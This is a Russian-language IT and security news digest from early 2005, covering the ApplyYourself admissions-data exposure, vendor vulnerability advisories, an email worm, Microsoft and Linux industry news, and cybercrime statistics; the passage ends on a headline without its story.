Претенденты на обучение в ряде ведущих бизнес-школ США, в том числе Гарвардской бизнес-школы (HBS), получили возможность через сайты учебных заведений узнать о результатах своих заявлений на месяц раньше положенного срока. Такой шанс потенциальным бизнесменам предоставил хакер brookbond, сообщает ежедневное гарвардское издание Crimson. В течение девяти часов претенденты на обучение могли зайти на сайты и следуя инструкциям, которые хакер разместил на форуме издания Business Week около полуночи 2 марта, получить информацию о своем статусе в бизнес-школе. По сведениям модераторов Business Week, неожиданной возможностью воспользовались всего несколько человек. HBS ведет прием заявлений и рекоммендаций через специальную онлайн-форму ApplyYourself. С ее же помощью претенденты могут узнать, какое решение принимает бизнес-школа. «Я знаю, что каждый претендент испытывает все большее беспокойство и хочет проверить свой статус в HBS. Я изучил сайт и нашел способ, который поможет сделать это», — написал хакер. Исполнительный директор программы MBA при HBS сообщил, что послания хакера были удалены с форума утром 2 марта: «Это были лишь внутренние административные инструкции». По словам одного из менеджеров программы ApplyYourself Лена Метэни (Len Metheny), он и его коллеги известили ряд школ об инциденте. «Проблема была решена с 9:45 этим утром. Мы внесли несколько изменений в систему и закрыли доступ к информации», — рассказал Метэни. Он подчеркнул, что претенденты могли получить сведения только о собственном статусе. Директор Business Week по связям с общественностью рассказал, что издание удалило сообщение хакера с форума сразу после того, как узнало о нем. Кто скрывается за псевдонимом brookbond, модераторам форума выяснить не удалось.
Viruslist

5/03/2005 10:46 В марте Microsoft не планирует выпуска новых заплаток
Ожидать появления новых заплаток для программных продуктов корпорации Microsoft в текущем месяце не стоит, сообщает "Компьюлента". По крайней мере, подобная информация содержится в предварительном уведомлении, появившемся на веб-сайте софтверного гиганта в пятницу. В настоящее время Microsoft публикует бюллетени безопасности на собственном сайте технической поддержки во вторник второй недели каждого месяца. В феврале были выпущены заплатки для многочисленных дыр в различных версиях операционных систем Windows, а также для опасной уязвимости в Office ХР, которая теоретически может использоваться злоумышленниками для получения несанкционированного доступа к удаленному компьютеру. Кроме того, в февральскую серию обновлений вошел кумулятивный патч для браузера Internet Explorer. Всего в прошлом месяце Microsoft заделала семнадцать дыр. В марте, как уже отмечалось, новые заплатки для продуктов Microsoft, вероятнее всего, не появятся. Между тем, как сообщает PCWorld со ссылкой на датскую компанию Secunia, только в браузере Internet Explorer шестой версии содержатся порядка 30 открытых или частично открытых уязвимостей. Кстати, корпорация Microsoft уже не первый раз отказывается от ежемесячного выпуска патчей. Новые заплатки также не были представлены в декабре 2003 года.
Подробности

5/03/2005 09:39 Вышла бета-версия браузера Netscape 8
После непродолжительной задержки AOL выложила в свободный доступ первую бета-версию нового поколения браузера Netscape. Предварительный вариант Netscape 8 стал доступен для ограниченного числа тестеров в конце прошлого года. Главной особенностью программного продукта является наличие двух движков, позаимствованных у браузеров Mozilla и Internet Explorer 6. Кроме того, разработчики выделяют расширенные функции безопасности. В частности, в Netscape 8 встроены средства защиты от фишинга - способа интернет-мошенничества, при котором злоумышленники обманным путем пытаются выманить у своих жертв конфиденциальную информацию, например, номера банковских счетов или карт социального страхования. При этом фишеры действуют преимущественно, через подставные веб-сайты. Как раз с такими сайтами и борется Netscape 8, проверяя, не занесен ли посещаемый пользователем ресурс в "черный список". Предусмотрена также цветовая индикация уровня безопасности посещаемых сайтов. Наконец, Netscape 8 отличается расширенной поддержкой каналов RSS. Ожидалось, что бета-версия Netscape 8 будет выпущена 17 февраля. Однако из-за выявленных в ходе тестирования недоработок дата анонса была перенесена на неопределенный срок. Впрочем, ждать пользователям пришлось недолго, и сейчас новый браузер доступен для загрузки на веб-сайте разработчиков. Минимальные требования к компьютеру следующие: процессор с тактовой частотой 233 МГц (рекомендуется 1 ГГц и выше), 64 Мб оперативной памяти (рекомендуется 256 Мб), 35 Мб свободного пространства на жестком диске и операционная система Microsoft Windows 98SE/ME/2000/ХР.
"Компьюлента"

5/03/2005 09:11 Звезды "Оскара" носят с собой уязвимые мобильники
В свете недавнего инцидента с мобильным коммуникатором Пэрис Хилтон - телеведущей, модели, актрисы и наследницы всемирно известной гостиничной сети Hilton, - данные из которого были украдены хакерами и были выставлены на публичное обозрение в Интернете, сотрудники консалтинговой компании Flexilis, специализирующейся на цифровой безопасности, провели эксперимент на звездах, приехавших на вручение премии "Оскар" в минувшее воскресенье. Принадлежащее Хилтон универсальное коммуникационное устройство T-Mobile Sidekick с функциями сотового телефона, фото- и видеокамеры, приспособленное для работы с Интернетом, содержало в своей памяти, среди прочего контактные данные около 500 знакомых супермодели, в число которых входят различного рода знаменитости наподобие певца Эминема и теннисистки Анны Курниковой. Телефоны и почтовые адреса этих людей были немедленно атакованы фанатами, и звезды были вынуждены их отключить. Достоянием общественности стали также некоторые фотографии, которые Хилтон снимала своим устройством. Как именно были украдены эти данные, неизвестно, однако есть подозрение, что они были извлечены при масштабном взломе американского подразделения сотового оператора T-Mobile, который был раскрыт в январе. Клиентом этого оператора и является Хилтон. Однако это не единственная версия. Специалисты Flexilis приехали на церемонию вручения "Оскара" и разместились среди сотен зрителей, пришедших к "красному ковру", по которому знаменитости после прибытия входили в здание концертного зала Kodak Theater в Лос-Анджелесе. Как рассказывается в газете New York Times, несмотря на беспрецедентное количество сотрудников служб безопасности, им удалось пронести ноутбук и мощный передатчик, сканировавший близлежащую территорию на наличие устройств, поддерживающих формат беспроводной передачи данных Bluetooth. Специалисты выявляли Bluetooth-устройства, принадлежавшие тем, кто выходил на "красную дорожку" и оценивали, насколько уязвимыми являются данные, хранящиеся в них. Оказалось, что около 100 таких устройств - телефонов, смартфонов и КПК - предоставляли возможность внешнего постороннего доступа к содержащимся в них данным. Сотрудники Flexilis не стали проникать в "открытые" телефоны, так как это было бы нарушением законодателтства, поэтому выяснить кому они принадлежали, не могли.
Более подробно

4/03/2005 11:28 В Китае усиливается наблюдение за онлайн-форумами
В канун очередной ежегодной сессии Народного конгресса, китайские власти ужесточают контроль над полетом свободной мысли в форумах и чат-каналах, пользующихся популярностью среди отдельных представителей деструктивной оппозиции. На повестке дня Народного конгресса – высшего законодательного органа страны, стоит вопрос о принятии проекта закона о защите территориальной целостности Китая, направленного на возвращение в лоно острова Тайвань. Остров этот вышел из состава Большого Китая в 1949 году, когда к власти пришли коммунисты, а верхушка партии Гоминдан поспешно эвакуировалась на Тайвань. Правительство мятежной провинции уже несколько десятилетий пытается добиться международного признания, периодически провоцируя Пекин на смутные угрозы, в которых легко можно разобрать слова, похожие на "мы вас", "в порошок" и "в бараний рог". Несколько лет назад Тайвань пыталось признать одно карликовое государство, но в тот раз китайскому дипломатическому ведомству удалось быстро уговорить власти страны отказаться от своего намерения в обмен на "техническую помощь". То есть, понятно, что тема эта для Пекина весьма болезненна. Так вот. По информации агентства Синьхуа, все сообщения, отправленные на дискуссионные листы, форумы и другие места интеллектуального общения в ходе сессии Народного конгресса, будут не только фильтроваться сотрудниками служб безопасности страны, но и подвергаться цензуре. В Сети появятся только сообщения, прошедшие тест на благонадежность, а остальным придется подождать с высказыванием своего мнения до лучших времен. О наступлении лучших времен будет объявлено дополнительно.
Internet.Ru

4/03/2005 10:46 Еврокомиссия отказывается заново рассматривать проект о софтверных патентах
По данным сайта NoSoftwarePatents.com, Еврокомиссия отказалась начинать заново рассмотрение проекта директивы Евросоюза о введении патентов на программное обеспечение. Спустя некоторое время представители Еврокомиссии подтвердили официально, что 100% пересмотра директивы Computer Implemented Inventions Directive (CIID) не планируется.
Подробности

4/03/2005 10:32 Критические дыры в медиаплеерах Real Networks
Компания Real Networks опубликовала бюллетень безопасности, содержащий информацию о двух критических дырах в программных медиаплеерах RealPlayer, RealOne Player, Helix Player и RealPlayer Enterprise, cообщает "Компьюлента". Уязвимости теоретически обеспечивают возможность несанкционированного выполнения произвольных операций на удаленном компьютере. Для реализации нападения злоумышленнику необходимо вынудить жертву открыть при помощи одной из вышеназванных программ сформированный особым образом файл в формате WAV или SMIL. Загрузка такого файла спровоцирует ошибку переполнения буфера и вызовет последующее выполнение вредоносного кода. Дыры присутствуют в приложениях RealPlayer версий 10.x (для операционных систем Windows, Mac OS и Linux), RealOne Player версий 1/2 (для Windows и Mac OS), Helix Player (для операционных систем Linux и Symbian), а также RealPlayer Enterprise версии 1.х (для Windows). Пользователи операционных систем Microsoft Windows и Apple Mac OS могут загрузить соответствующие обновления, воспользовавшись функцией Check for Update в меню вышеперечисленных программных продуктов. В случае с Linux необходимо посетить веб-сайт компании Real Networks и скачать заплатки вручную. Несмотря на высокую степень опасности выявленных дыр, реальных случаев их эксплуатации пока зафиксировано не было. По крайней мере, сообщения о подобных инцидентах в компанию Real Networks не поступали.
Подробности

4/03/2005 09:50 Intel представила технологию ускоренного ввода/вывода
На IDF-2005 в Сан-Франциско корпорация Intel представила технологию ускоренного ввода и вывода (Intel I/O Acceleration Technology). «Технология Intel I/OAT возникла, когда мы взглянули на проблему с точки зрения платформы», - сказал Пэт Гелсингер, глава Digital Enterprise Group. – «Конечные пользователи почувствуют увеличение производительности, прежде всего, в работе с приложениями электронной коммерции». В технологии ускорения ввода-вывода Intel задача управлениями данными распределяется между всеми компонентами платформы – процессором, набором микросхем, сетевым контроллером и ПО. Такой общеплатформенный подход позволяет снизить нагрузку на процессор и ускорить обмен данными. Загруженность процессора снижается потому, что чипсет и сетевой контроллер получают возможность считывать данные из памяти и записывать их в память. Корпорация Intel также оптимизировала протокол ТСР/IP. Этот подход позволил ускорить обмен данными между платформой и приложениями на 30%. В прошлом месяце корпорация Intel представила новую возможность технологии I/OAT – технологию ускорения доступа к устройствам данных RAID-6. Корпорация Microsoft обещает обеспечить встроенную поддержку технологии I/OAT в будущих версиях OC Windows Server. В этих версиях также будет использоваться технология, которая позволяет сбалансировать трафик ТСР/IP при использовании многоядерных процессоров.
CNews

4/03/2005 09:36 Adobe предлагает ПО с открытым исходным кодом для разработки интерфейса
Гигант графического ПО — Adobe Systems — выпустил некоторые компоненты своих коммерческих продуктов в виде программного обеспечения open source, намереваясь помочь другим облегчить трудоемкую, но важную часть процесса программирования. Adobe открыла два пакета: Adam и Eve, — которые она применяет для создания интерфейса управления приложениями. Эти пакеты опубликованы на веб-сайте компании. Она утверждает, что сделала это, чтобы «отплатить замечательному сообществу open source, которое так много нам дает», и заручиться поддержкой других в совершенствовании данных пакетов. Большинство продуктов Adobe закрыты, но компания постепенно сближается с миром open source. Сегодня ее флагманские продукты работают только на Windows и Mac OS, но в 2004 году Adobe начала серьезнее присматриваться к Linux. А ее последняя бета-версия Adobe Reader, программы для просмотра PDF-файлов, работает под Linux. Adam и Eve — это библиотеки, которые могут использоваться другими пакетами. Eve облегчает создание таких элементов интерфейса, как диалоговые окна, и позволяет управлять их положением на дисплее. Adam автоматизирует процесс модификации элементов интерфейса в соответствии с меняющимися условиями. «Спросите любого инженера-программиста, что он больше всего ненавидит делать, и почти каждый скажет: „Заниматься построением пользовательского интерфейса”. Даже с Eve это утомительная работа, — говорится в обзоре технологии Adobe. — Код, связанный с пользовательским интерфейсом, занимает почти треть всего кода, необходимого для реализации функций в приложениях Adobe». Eve дебютировала в форме прототипа в Adobe Photoshop 5 и теперь существует в версии Eve2. Adam входит в несколько программ Adobe. Обе библиотеки могут использоваться с любой операционной системой. Adam и Eve являются частью более крупного проекта, называемого Adobe Source Libraries (ASL), которым занимается Adobe Software Technology Lab. ПО ASL подчиняется либеральной лицензии open source MIT License.
Сайт проекта

4/03/2005 09:24 МВД: В России растет количество киберпреступлений
По оценкам российского МВД, в России количество высокотехнологичных преступлений в 2004 году выросло по сравнению с 2003 годом на 25 процентов и составило порядка 13 тысяч. Об этом, как передает РИА "Новости", сообщил в четверг на пресс-конференции начальник бюро специальных технических мероприятий МВД Борис Мирошников. Он отметил, что на протяжении последних нескольких лет количество киберпреступлений практически удваивалось ежегодно. "В прошлом году тенденция удвоения преступлений остановилась, и мы увидели рост всего порядка на четверть", - сказал Мирошников. Вместе с тем, он выразил обеспокоенность тем, что растет не только количество преступлений, но и их качество, ущерб, который они наносят. По данным, которые привел Мирошников сообщил, мировой ущерб от киберпреступлений ежегодно составляет порядка 40 миллиардов долларов. Он добавил, что в России такой статистики не ведется.
РИА "Новости"

3/03/2005 19:20 Microsoft пообещала выпустить окончательные версии 64-битных Windows через месяц
Джим Олчин (Jim Allchin), глава подразделения Microsoft, ответственного за разработку ОС Windows, выступая во вторник на конференции разработчиков Intel Developer Forum, объявил, что официальный выход 64-битных версий Windows XP и Windows Server 2003 намечен на апрель, сообщает CNet News. В настоящее время на рынке уже присутствуют их тестовые релизы в различных вариантах. 64-битные версии систем предназначены для работы с 64-битными процессорами, которые только начинают появляться на массовом рынке (64-битная модификация Intel Pentium 4 запущена в серийное производство в феврале, хотя Athlon 64 от AMD выпускается уже около полутора лет). Существующие массовые ОС являются 32-битными, для полноценной работы пользователя в 64-битном режиме необходимо, чтобы у него был поддерживающий его процессор, ОС и прикладное ПО. Тем не менее, 64-битная техника и ПО могут работать и в 32-битном режиме. 64-битный режим обеспечивает обработку большего числа данных при той же технической мощности, что призвано увеличить эффективность работы требовательных к ресурсам приложений. В настоящее время это касается главным образом различных специализированных пакетов, однако впоследствии на 64-битный режим планируют переходить и разработчики массовых программ - ожидается, что широкое распространение 64-битных технологий начнется с выходом новой ОС от Microsoft с рабочим названием Longhorn, которая призвана прийти на смену Windows XP - ее выход намечен на следующий год. Предполагается, что долго ожидавшийся и несколько раз отложенный финальный выход 64-битных модификаций массовой Windows XP Professional и серверной Windows Server 2003 послужит стимулом для разработчиков к созданию и развитию 64-битных версий своих продуктов, и к выходу Longhorn рынок ПО будет подготовлен к массовому переходу на 64-битные системы.
Подробности

28/02/2005 13:16 Уязвимости в Mozilla Firefox
После выхода новой версии браузера Mozilla Firefox появились подробности ещё двух уязвимостей в этом браузере. Уязвимости позволяют удаленному пользователю выполнить произвольный код и локальному пользователю удалить произвольные файлы в системе. Уязвимость в реализации XPCOM позволяет злоумышленнику с помощью специально сформированного URL выполнить произвольный код в браузере с полномочиями пользователя. Небезопасное создание временных файлов на UNIX-платформах позволяет локальному пользователю создать символическую ссылку с критического файла на системе и удалить его с привилегиями пользователя, запустившего браузер. Для устранения уязвимостей рекомендуется обновиться до версии 1.0.1.
Подробности

28/02/2005 12:34 Ознакомительная версия Red Hat Enterprise Linux 4
Компания RedHat объявила о начале распространения ознакомительной версии продукта Red Hat Enterprise Linux 4 (модификации AS, ES, WS, Desktop), сообщает opennet.ru. В течении ограниченного времени можно скачать RHEL 4 и на 30 дней получить доступ к апдейтам и базе технической информации. В сети все больше и больше получает распространение проект CentOS (The Community Enterprise OS), являющийся по сути открытым аналогом RHEL.
Об акции Red Hat

28/02/2005 12:19 Microsoft предлагает $5 за уничтоженные данные
Microsoft готова возместить пользователю потери данных, вызванные работой бета-версии антишпионской программы AntiSpyware, в размере до $5. Такой пункт появился в лицензионном соглашении для конечных пользователей (EULA). Как правило, компании никогда не предлагают деньги за последствия плохой работы своих программ. Все лиценизонные соглашения содержат пункт о том, что пользователь согласен использовать продукт на свой страх и риск. В данном случае, Microsoft нельзя назвать исключением, так как предложенная сумма мизерна. Она вряд ли утешит пользователя, который лишится коллекции звукозаписей и цифровых фотографий. Исключением можно назвать компанию PC Pitstop, разрабатывающую утилиты удаления шпионского ПО и оптимизации системы. Пользователю, который потеряет данные по вине одноименной программы, обещают выплатить до $1 тыс. Как утверждают в компании, такой случай уже был. На ущерб пожаловался один из 3 тыс. человек, загрузивших программу с сайта за 4 месяца, и ему выплатили обещанную сумму.
CNews

28/02/2005 11:56 Microsoft запустит корпоративную "аську"
Как ожидается, в течение ближайших нескольких недель председатель совета директоров компании Microsoft Билл Гейтс анонсирует новое средство обмена мгновенными сообщениями (IM) для общения в реальном времени, известное под кодовым названием Istanbul. Церемония анонсирования нового IM-сервиса пройдет 8 марта в Сан-Франциско, сообщает Silicon.com: на этой неделе журналисты и партнеры Microsoft уже были приглашены на это событие, в течение которого, как говорится в послании корпорации, Билл Гейтс «представит новое и революционное предложение Microsoft для общения в реальном времени». Пресс-секретарь Microsoft не уточнил, будет ли намечающееся событие посвящено одному лишь сервису Istanbul, однако многие обозреватели называют данное решение следующим крупным шагом Microsoft на рынке средств обмена мгновенными сообщениями. Будет ли данный сервис и дальше назваться кодовым именем Istanbul, или же будет официально представлен под другим названием, также пока неизвестно. На протяжении последних нескольких месяцев Istanbul находился в стадии бета-тестирования. Новый IM-клиент предназначен для корпоративной системы обмена мгновенными сообщениями под названием Live Communications Server, представленной в октябре 2004 года. Тем не менее, возможности Istanbul шире, чем у обычной службы обмена сообщениями в реальном времени: кроме обмена данными, в том числе, голосовыми и видео, он оснащен функцией определения присутствия, которая позволяет убедиться в том, что пользователь находится на месте и в данный момент работает с определенным устройством (или устройствами). К примеру, Istanbul читает записи пользователя в календаре программы Outlook и сам решает, куда перенаправлять входящие звонки, — на рабочий или мобильный телефон. По словам представителей Microsoft, Istanbul будет готов для окончательного запуска на рынок в первой половине этого года. Он придет на смену IM-клиенту Windows Messenger. По словам представителей Microsoft, набор функций Windows Messenger и Istanbul будет отличаться примерно так же, как у клиентов почтового сервера Microsoft Exchange — Outlook Express и Outlook. Кроме того, Istanbul сможет взаимодействовать с IM-службами от AOL и Yahoo, а также с другими коммуникационными технологиями на базе протоколов SIP (Session Initiation Protocol) или SIMPLE (SIP for Instant Messaging and Presence Leveraging Extensions), такими, как системы видеоконференцсвязи или IP-PBX.
CNews

28/02/2005 11:26 Сайты киргизских информагентств подверглись хакерским атакам
Хакеры атаковали сайты ведущих информационных агентств Киргизии, о чем заявили на пресс-конференции представители государстванного информагентства "Кабар". По их словам, злоумышленники искусственно организовали поток запросов на сайт агентства и сайт провайдера, вследствие чего ресурсы стали недоступны. Специалисты уверены, что хакерская атака организована из-за рубежа и практически блокирует получение оперативной информации из Киргизии в период проведения выборов. Информагентство "Кабар" было вынуждено организовать доступ к информации по новому адресу, сообщает РИА "Новости".
Источник

28/02/2005 11:15 В антивирусах Trend Micro найдена критическая уязвимость
Критическая уязвимость была обнаружена на минувшей неделе в антивирусном программном обеспечении компании Trend Micro, сообщает сайт Security Pipeline. Обнаруженный изъян присутствует в целой серии продуктов компании, затрагивая программы для рабочих станций, серверов и шлюзов. Trend Micro стала третьим производителем антивирусов, в чьих продуктах в феврале были обнаружены бреши. Как и в двух предыдущих случаях с Symantec и F-Secure, брешь обнаружили эксперты компании Internet Security Systems. Брешь в программах Trend Micro связана с файловым форматом ARJ. По словам сотрудников ISS, хакеры могут использовать эту брешь для «получения неавторизованного доступа к сетям и машинам, защищенным от вирусов программами TrendMicro». В числе подверженных изъяну программ названы: Messaging Suite, VirusWall, ScanMail и ряд других. Полный список уязвимых программ приведен на сайте Trend Micro. Чтобы получить доступ к системе, хакеру достаточно отправить электронное письмо со специальным ARJ-файлом адресату, чей компьютер он хочет атаковать. У Symantec подобные проблемы возникали с файлами формата UPX, а у F-Secure — с файлами, архивированными ARJ. Trend Micro охарактеризовала уязвимость как «критическую» и разместила на своем сайте обновление, с помощью которого пользователи могут ее ликвидировать. Пользователям продуктов компании настоятельно рекомендовано установить это обновление как можно скорее. «В среде специалистов по безопасности кто-нибудь постоянно находит какие-то уязвимости. Если исследователь соблюдает требования протокола о раскрытии информации, правильнее предать эту информацию огласке», — комментирует ситуацию вице-президент аналитической компании Gartner Джон Пескаторе (John Pescatore). По словам Пескаторе, неписанный протокол позволяет исследователям публиковать информацию об уязвимостях только после того, как они оповестили об этом производителей и дали им от 30 до 45 дней на решение проблемы. ISS соблюдала эти правила в случаях со всеми тремя производителями антивирусов.
Viruslist

28/02/2005 10:59 Шаг Microsoft ведет к войне цен на рынке баз данных
В среду Microsoft представила более дешевую версию своей СУБД — этот шаг может привести к дальнейшему снижению цен на рынке баз данных. В первом полугодии компания планирует выпустить SQL Server 2000 Workgroup, версию для малых предприятий за $3899 на процессор. Кроме того, компания добавит ряд новых возможностей в будущее обновление SQL Server 2005, запланированное на это лето, и расширит партнерские отношения с Dell, что позволит заказчикам получать поддержку от производителя ПК. В перекомпонованном комплексе продуктов Microsoft намерена предложить альтернативы для ряда конкурирующих программ, включая продукты open-source и СУБ тяжеловесов Oracle и IBM. «Мы хотим обеспечить превосходство над конкурентами, кто бы они ни были, — говорит директор по управлению продуктами отделения Microsoft SQL Server Том Риццо. — Мы убеждены, что состав и схема лицензирования этого продукта делают его уникальным». Microsoft, Oracle и IBM — три главных поставщика СУБД. Вместе они поглощают львиную долю денег, расходуемых заказчиками на реляционные базы данных. В прошлом году Oracle и IBM выпустили по недорогой редакции своих СУБД, стараясь подхлестнуть продажи на рынке предприятий среднего размера, где у Microsoft прочные позиции. Кроме того, в прошлом году повысился интерес к базам данных с открытым исходным кодом, хотя расходы на эти продукты составляют мизерную часть от многомиллиардного рынка. ПО open source обычно доступно бесплатно; однако корпоративные заказчики оплачивают поставщику услуги по технической поддержке.
Подробнее

28/02/2005 10:33 Умер создатель компьютера Macintosh
Скончался Джеф Раскин (Jef Raskin) один из основателей компании Apple Computer Inc. и автор идеи компьютера Macintosh, сообщает Forbes. Раскин умер в воскресенье в возрасте 61 года от рака поджелудочной железы, сообщила его семья. Раскин пришел в Apple Computer в 1978 году и стал 31-ым сотрудником компании. Именно Раскину принадлежит идея создания первого компьютера Macintosh. Перед создателями ставилась задача сделать недорогой, ориентированный на рядового пользователя и максимально простой в обращении компьютер. Он же и придумал новому компьютеру название Macintosh - в честь его любимого сорта яблок "макинтош". Apple Computer Раскин покинул в 1982 году из-за разногласий с основателем компании Стивом Джобсом (Steve Jobs), за два года до появления на американском рынке первого компьютера Macintosh. После ухода из Apple Computer Раскин основал собственную компанию по разработке программного обеспечения Information Appliance. Он также издал в 2000 году книгу "The Humane Interface" (в русском переводе - "Интерфейс: новые направления в проектировании компьютерных систем").
Lenta.Ru

27/02/2005 14:28 Уязвимость в WU-FTPD
iDEFENSE cообщает об уязвимости в популярном в мире открытых систем FTP-демоне под названием WU-FTPD (выпускается и поддерживается Вашингтонским университетом). Уязвимость связана с некорректной обработкой пользовательского (клиента) ввода. Присутствует в функции wu_fnmatch() в файле wu_fnmatch.c. В случае присутствия в вводимых данных символа шаблона - "*", происходит рекурсивный вызов функции самой себя. В итоге при формировании большого количества подобных запросов возможна ситуация исчерпания выделяемой памятью, с дальнейшим отказом функционирования (DoS). Уязвимость подтверждена в версии 2.6.2, являющейся крайней на текущий момент. Попытки связаться с разработчиками оказались безрезультатными.
Подробности

27/02/2005 12:42 Украдены данные о счетах миллиона клиентов Bank of America
Bank of America сообщил, что сотрудниками банка утеряны компьютерные носители с содержащимися на них данными о счетах более миллиона клиентов, большинство которых - федеральные служащие. Среди пострадавших - несколько членов американского Сената, передает Би-би-си. Об обстоятельствах пропажи представители банка не сообщили, однако от источников в осведомленных кругах стало известно, что носители с информацией были украдены при их транспортировке. По сообщениям представителей Bank of America, счета клиентов, информация о которых содержалась на утраченных носителях, находятся под особым наблюдением, однако подозрительных транзакций по этим счетам произведено не было.
SecurityLab

27/02/2005 12:19 Microsoft будет сворачивать онлайн-активацию
Начиная с 28 февраля MS прекратит онлайновую активацию Windows, использующих сертификаты аутентичности (Certificate of Authenticity, COA), выданные 20 крупнейшим производителям компьютеров, сообщает bugtraq.ru. Проблема заключается в том, что эти сертификаты могли быть легко скопированы и использованы для установки "пиратских" версий. Теперь при попытке активации системы с таким сертификатом пользователю будет предложено позвонить в Microsoft, ответить на ряд вопросов и получить новый код. В следующем квартале MS планирует распространить блокировку активации на все преактивированные копии Windows. Мораль: пользуйтесь volume license.
Подробности

27/02/2005 11:47 Microsoft признает угрозу Linux-эмулятора Wine
По словам представителей Microsoft, корпорация в своей антипиратской утилите уделяет особое внимание тому, чтобы не дать пользователям Wine, позволяющего запускать Windows-приложения в среде Linux, возможность скачивать обновления к Windows, сообщает linux.org.ru. Что примечательно, Джереми Уайт (Jeremy White) из компании CodeWeavers, продающей продукты на базе Wine, был известием от Microsoft больше восхищен чем обеспокоен - ведь раньше корпорация предпочитала вообще "не говорить о Wine", а теперь фактически признала угрозу со стороны эмулятора.
Подробнее

27/02/2005 11:25 Новый червь Assiral маскируется под любовное письмо
Эксперты Sophos обнаружили новый компьютерный вирус, рассылаемый по электронной почте под видом признания в любви. Этот прием почти пять лет назад использовал червь VBS/Lovelet (известный также как Iloveyou или The Love Bug). Червь W32/Assiral-A распространяется по электронной почте. В теме письма находится фраза Re: LOV YA!, в теле письма Kindly read and reply to my LOVE LETTER in the attachments :-). Прикрепленный файл называется LOVE_LETTER.TXT.exe. Когда пользователь запускает прикрепленный файл, червь пытается скопировать себя на другие компьютеры и открыть веб-страницу, размещенную на сервере Geocities. Кроме того, червь оставляет на зараженном компьютере файл с текстовым сообщением, начинающимся Greetz from LARISSA.B! «Прошло почти пять лет с тех пор, как скандально известный червь Love Bug, используя ту же тактику, обманул миллионы пользователей Windows во всем мире. Так что теперь маловероятно, что Assiral сможет нанести такой же вред», — считает Грэм Клули (Graham Cluley), старший консультант компании Sophos, сообщила «Диалог-Наука».
Источник

27/02/2005 11:14 Microsoft выпустила очередную "заплату" на "заплату"
Корпорация Microsoft выпустила вторую «заплату» на патч Windows XP Service Pack 2. «Заплата» предназначена для предотвращения отказов системы из-за установки антивирусов или брандмауэров сторонних производителей. В корпорации считают, что «заплата» не связана с ошибками в системе безопасности ОС, однако признают, что «она является решением для закрытия критической уязвимости», сообщил Computer Weekly.
CNews

27/02/2005 10:55 МТС обзавелась "Большим Братом"
Услуги, основанные на технологиях определения местоположения пользователей мобильных телефонов (LBS-услуги), похоже, скоро станут в России популярными. Правда, операторы не так быстро реагируют на потребности своих абонентов, как тем бы хотелось. Прошло полтора года с тех пор, как о запуске подобных услуг объявил «Мегафон». Вчера с подобным проектом стартовали МТС. И, как стало известно CNews, объявить о предоставлении LBS-услуг вскоре намерен и «ВымпелКом». МТС объявила о запуске интернет-портала «МТС-Поиск», который предоставляет абонентам оператора в московском регионе новый тип информационных и развлекательных сервисов, основанных на определении текущего местоположения пользователя (точнее, его мобильного телефона). Доступ к порталу осуществляется как через интернет (через соответствующий раздел сайта компании), так и с мобильного телефона — при помощи SMS или WAP. В компании утверждают, что определение местоположения абонента возможно исключительно с его разрешения. В этом случае абонент должен отправить SMS со специальным кодом. Услуги портала сгруппированы в три раздела: «Мой город», «Мои друзья» и «Развлечения». Все разделы постоянно пополняются новыми сервисами и играми. LBS-услуги оказывают независимые партнеры МТС, которые подключаются к порталу в качестве контент-провайдеров. В разделе «Мой город» представлена услуга «Где я», которая позволяет абоненту определить собственное местоположение и получить информацию о расположении разнообразных объектов городской инфраструктуры. Рубрикатор позволяет найти близлежащие объекты: рестораны, клубы, концертные залы, кинотеатры, медицинские центры и т. п.
Подробнее

27/02/2005 10:36 Mandrakesoft покупает компанию Conectiva
Компании Mandrakesoft и Conectiva опубликовали каждая по пресс-релизу, извещая общественность о грядущем слиянии. Mandrakesoft согласилась приобрести Conectiva за почти два миллиона евро, что чуть-чуть превышает общую прибыль Conectiva за прошлый финансовый год. Conectiva была образована в 1995 году, и на данный момент насчитывает в штате 60 человек. И Mandrakesoft, и Conectiva являются членами Linux Consortium - организации, пытающейся выработать единые стандарты для всех дистрибутивов Linux. Пока без особого, впрочем, успеха. Роднит Conectiva и Mandrakesoft ещё и близость к государственным структурам в своих странах. Среди клиентов Conectiva - бразильская армия, среди клиентов Mandrakesoft - французские правительственные организации. У обеих фирм также существуют связи с крупными производителями компьютерного оборудования, в частности, HP. Ещё в прошлом году компании Mandrakesoft всерьёз угрожало банкротство, однако каким-то образом она всё-таки смогла вернуться к прибыльности своего бизнеса, и даже нашла средства на приобретение Conectiva. Обе компании полагают, что слияние укрепит их позиции, хотя, как признаёт Гаэль Дюваль, один из основателей Mandrakesoft, обороты новой компании едва ли достигнут значений, сопоставимых с оборотами Red Hat Linux или Novell. Впрочем, существует вероятность, что Mandrakesoft-Conectiva и дальше будут продолжать поглощать более мелкие компании с целью дальнейшего наращивания "мускулов".
Пресс-релиз

27/02/2005 10:03 Британское правительство создает сайт о цифровой госбезопасности
Правительство Великобритании ведет работы над созданием специального сайта, который призван предупреждать британских пользователей Интернета о массовых угрозах в области компьютерной безопасности, сообщает BBC News. К таким угрозам относятся вирусные эпидемии, хакерские атаки, обнаружение критических уязвимостей в популярном ПО. На сайте, который получил название IT Safe, будут публиковаться бюллетени правительственных компьютерных экспертов, в которых будет освещаться текущая ситуация и даваться квалифицированные советы по противодействию возникающим угрозам. По оценкам аналитиков, в нынешних условиях в год может происходить от 6 до 10 событий, заслуживающих объявления "цифровой тревоги" в масштабах страны. Как известно, в настоящее время ситуация в Интернете признается как крайне нестабильная из-за массового проникновения в него злоумышленников на фоне плохой подготовленности пользователей в области компьютерной безопасности. В связи с этим многие эксперты призывают государственные органы разных стран обратить пристальное внимание на эту проблему, в противном случае экперты предрекают катастрофические последствия.
Lenta.Ru

25/02/2005 11:06 СУБД для хранения конфигураций
Сетевая приставка Foundation 4.6, выпущенная компанией Tideway Systems, предназначена для централизованного сбора и сохранения данных о конфигурациях приложений, функционирующих в корпоративном датацентре. Система автоматически определяет настройки, сохраняет полученные сведения и обновляет их по мере внесения изменений в конфигурации. Для опроса серверов и других устройств в сети устройство пользуется безагентскими методами. Особенностью системы является возможность построения визуальных моделей составных бизнес-приложений с отображением используемых ими программных и аппаратных ресурсов датацентра. Приставка может использоваться как средство сбора конфигурационных данных для инструментариев управления системами. Применение централизованной СУБД для хранения конфигураций рекомендовано, в частности, в библиотеке оптимальных методик администрирования ITIL. Подобные базы данных недавно начали предлагать как крупные производители, например BMC и CA, так и начинающие фирмы.
"Открытые системы"

25/02/2005 10:44 ИТ-гиганты стандартизируют оценку уязвимостей
